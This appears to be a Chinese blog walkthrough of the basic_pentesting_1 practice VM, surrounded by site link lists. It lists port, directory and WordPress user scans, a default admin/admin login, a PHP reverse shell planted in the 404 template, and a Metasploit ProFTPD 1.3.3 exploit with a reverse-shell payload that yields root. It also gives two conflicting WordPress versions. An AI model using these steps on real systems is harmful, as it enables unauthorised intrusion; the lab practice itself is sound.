靶机来源-basic_pentesting_1【VX订阅号:0x00实验室】

  • 开发
  • 38

basic_pentesting_1【VX订阅号:0x00实验室】

arp-scan扫描靶机IP

masscan 192.168.253.153 --ports 0-65535 --rate=10000端口扫描

nmap扫描nmap -T5 -A -p- 192.168.253.153
21:ProFTPD 1.3.3

dirb http://192.168.253.153 目录扫描

http://192.168.253.153/secret/发现网站cms是wordpress

wpscan --url http://192.168.253.153/secret/

知道版本WordPress 4.9.24
msf没发现可利用漏洞
wpscan --url http://192.168.253.153/secret/ --enumerate u用户名枚举

admin/admin直接进来了
404界面写入phpshell
shell:反弹的phpwebshellphp-reverse-shell.php 默认目录及文件名/usr/share/webshells/php


把IP和port改成自己的,监听反弹
404监听不行,监听不到
WordPress 6.4.1
上传可以
在上传路径找到自己上传文件

换个方法
ftp端口开着
ProFTPD
搜索可利用模块search ProFTPD 1.3.3

设置payload,输入set payload cmd/unix/reverse、

设置目的地址和源地址

运行

获得root权限

阅读全部

相关推荐

  5. 0x01_实验课leetcode

    2024-01-20 20:24:02       18 阅读
  10. <span style='color:red;'>0</span><span style='color:red;'>X</span><span style='color:red;'>04</span>

    0X04

    2024-01-20 20:24:02      29 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-01-20 20:24:02       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-01-20 20:24:02       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-01-20 20:24:02       19 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-01-20 20:24:02       20 阅读

热门阅读

  3. SpringMVC 参数传递见解5

    2024-01-20 20:24:02       37 阅读

  12. 设计模式——备忘录模式

    2024-01-20 20:24:02       37 阅读

  13. 【算法详解】力扣169.多数元素

    2024-01-20 20:24:02       42 阅读

  15. c语言-位段

    2024-01-20 20:24:02       36 阅读

  27. 机器视觉企业实战

    2024-01-20 20:24:02       30 阅读

  28. 编程语言的运行时和垃圾回收机制概览

    2024-01-20 20:24:02       36 阅读

  29. ABC336(A-C)

    2024-01-20 20:24:02       41 阅读